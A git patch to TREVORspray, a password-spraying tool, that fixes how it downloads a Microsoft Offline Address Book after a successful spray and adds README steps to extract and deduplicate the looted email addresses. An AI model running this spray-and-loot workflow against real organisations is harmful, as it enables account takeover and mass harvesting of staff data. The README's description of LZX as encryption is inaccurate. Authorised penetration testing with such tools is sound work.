From 7e61724632e21dc996460d51ac3f277367a39c48 Mon Sep 17 00:00:00 2001
From: TheTechromancer <joel.moore@blacklanternsecurity.com>
Date: Wed, 19 Jan 2022 14:16:30 -0500
Subject: [PATCH] fixed bug retrieving LZX files, updated README

---
 README.md                       | 18 ++++++++++++++++++
 trevorspray/lib/looters/msol.py |  3 ++-
 trevorspray/lib/util.py         |  2 ++
 3 files changed, 22 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 00dd953..2bac7d9 100644
--- a/README.md
+++ b/README.md
@@ -94,6 +94,24 @@ done | tee f.last.txt
 trevorspray -u f.last.txt -p 'Fall2021!'
 ```
 
+## Extract data from downloaded LZX files
+When TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to `~/.trevorspray/loot`. LZX is an ancient and obnoxious encryption algorithm used by Microsoft.
+~~~bash
+# get libmspack (for extracting LZX file)
+git clone https://github.com/kyz/libmspack
+cd libmspack/libmspack/
+./rebuild.sh
+./configure
+make
+
+# extract LZX file
+./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin
+# extract all strings
+strings oab.bin
+# extract and dedupe emails
+egrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u
+~~~
+
 ## TREVORspray - Help:
 ```
 $ trevorspray --help
diff --git a/trevorspray/lib/looters/msol.py b/trevorspray/lib/looters/msol.py
index 1c44178..b67dc5c 100644
--- a/trevorspray/lib/looters/msol.py
+++ b/trevorspray/lib/looters/msol.py
@@ -277,9 +277,10 @@ def test_autodiscover(self, username, password):
                         lzx_file = self.loot_dir / lzx_url.split('/')[-1]
                         log.success(f'Downloading LZX for {username} to {lzx_file}')
                         try:
-                            download_file(url, str(lzx_file), verify=False, auth=auth)
+                            download_file(lzx_url, str(lzx_file), verify=False, auth=auth)
                         except Exception as e:
                             log.warning(f'Failed to retrieve LZX file at {lzx_url}')
+                        log.success('Successfully downloaded LZX file. See README for instructions on how to extract data.')
                     else:
                         log.warning(f'No LZX link found for {username}')
 
diff --git a/trevorspray/lib/util.py b/trevorspray/lib/util.py
index 162e112..91eb9cc 100644
--- a/trevorspray/lib/util.py
+++ b/trevorspray/lib/util.py
@@ -128,7 +128,9 @@ def is_url(d):
 
 def download_file(url, filename, **kwargs):
 
+    log.debug(f'Downloading file from {url} to {filename}, {kwargs}')
     with requests.get(url, stream=True, **kwargs) as response:
+        log.debug(f'Download result: HTTP {response.status_code}, Size: {len(response.text)}')
         response.raise_for_status()
         with open(filename, 'wb') as f:
             for chunk in response.iter_content(chunk_size=8192):